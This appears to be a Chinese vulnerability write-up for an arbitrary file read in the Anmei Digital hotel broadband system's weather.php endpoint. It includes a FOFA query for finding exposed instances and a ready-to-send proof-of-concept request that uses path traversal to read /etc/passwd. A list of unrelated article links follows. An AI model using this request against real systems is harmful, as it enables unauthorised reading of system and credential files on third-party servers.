当前位置: 首页 > news >正文

安美数字酒店宽带运营系统-任意文件读取

漏洞描述:

安美数字酒店宽带运营系统 weather.php 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态

 fofa语法:

app="安美数字-酒店宽带运营系统"

 poc

GET /user/weather.php?Lang=../../../etc/passwd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

 

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • xss-labs通关攻略 16-20关
  • 【GIT】Idea中的git命令使用-全网最新详细(包括现象含义)
  • 【管理型文档】软件需求管理过程(原件)
  • qemu 跨架构
  • linux系统中内存和缓冲简介
  • 小实战项目-第二章2.1-IIC协议讲解? 什么是软件IIC 什么是硬件IIC 有什么区别如何编写代码--这章节主要讲解软件IIC,下一章节讲解硬件IIC协议
  • 哈夫曼树例题
  • Matlab R2022b使用Camera Calibrator工具箱张正友标定法进行相机标定附带标定前后对比代码
  • 论文翻译:Multi-step Jailbreaking Privacy Attacks on ChatGPT
  • 设计模式(四)
  • 掌握 Rust 中的 YAML 魔法:Serde_yaml 使用指南
  • 【前端开发】国际化开发工具i18n的使用教程
  • MySQL 数据库深度解析:安装、语法与高级查询实战
  • BMC解决方案丨服务器故障诊断与预测平台方案设计与实现
  • 计算机毕业设计选题推荐-医疗就诊平台-在线医疗问诊系统-Java/Python项目实战
  • classpath对获取配置文件的影响
  • CSS居中完全指南——构建CSS居中决策树
  • HomeBrew常规使用教程
  • JS基础之数据类型、对象、原型、原型链、继承
  • Making An Indicator With Pure CSS
  • Netty 4.1 源代码学习:线程模型
  • PHP 小技巧
  • spring boot下thymeleaf全局静态变量配置
  • ucore操作系统实验笔记 - 重新理解中断
  • v-if和v-for连用出现的问题
  • 从PHP迁移至Golang - 基础篇
  • 爬虫模拟登陆 SegmentFault
  • 无服务器化是企业 IT 架构的未来吗?
  • 阿里云IoT边缘计算助力企业零改造实现远程运维 ...
  • ​​​​​​​开发面试“八股文”:助力还是阻力?
  • # Spring Cloud Alibaba Nacos_配置中心与服务发现(四)
  • #、%和$符号在OGNL表达式中经常出现
  • #pragma data_seg 共享数据区(转)
  • #经典论文 异质山坡的物理模型 2 有效导水率
  • $L^p$ 调和函数恒为零
  • (9)目标检测_SSD的原理
  • (Python第六天)文件处理
  • (三)终结任务
  • (算法)N皇后问题
  • (源码版)2024美国大学生数学建模E题财产保险的可持续模型详解思路+具体代码季节性时序预测SARIMA天气预测建模
  • (转)Linux整合apache和tomcat构建Web服务器
  • * 论文笔记 【Wide Deep Learning for Recommender Systems】
  • .L0CK3D来袭:如何保护您的数据免受致命攻击
  • .NET “底层”异步编程模式——异步编程模型(Asynchronous Programming Model,APM)...
  • .NET C# 使用 SetWindowsHookEx 监听鼠标或键盘消息以及此方法的坑
  • .NET Core 将实体类转换为 SQL(ORM 映射)
  • .NET 使用 XPath 来读写 XML 文件
  • .NET 应用架构指导 V2 学习笔记(一) 软件架构的关键原则
  • .NET开源项目介绍及资源推荐:数据持久层 (微软MVP写作)
  • .NET命令行(CLI)常用命令
  • @font-face 用字体画图标
  • @PreAuthorize注解
  • [ IOS ] iOS-控制器View的创建和生命周期
  • [20180224]expdp query 写法问题.txt
  • [Android]如何调试Native memory crash issue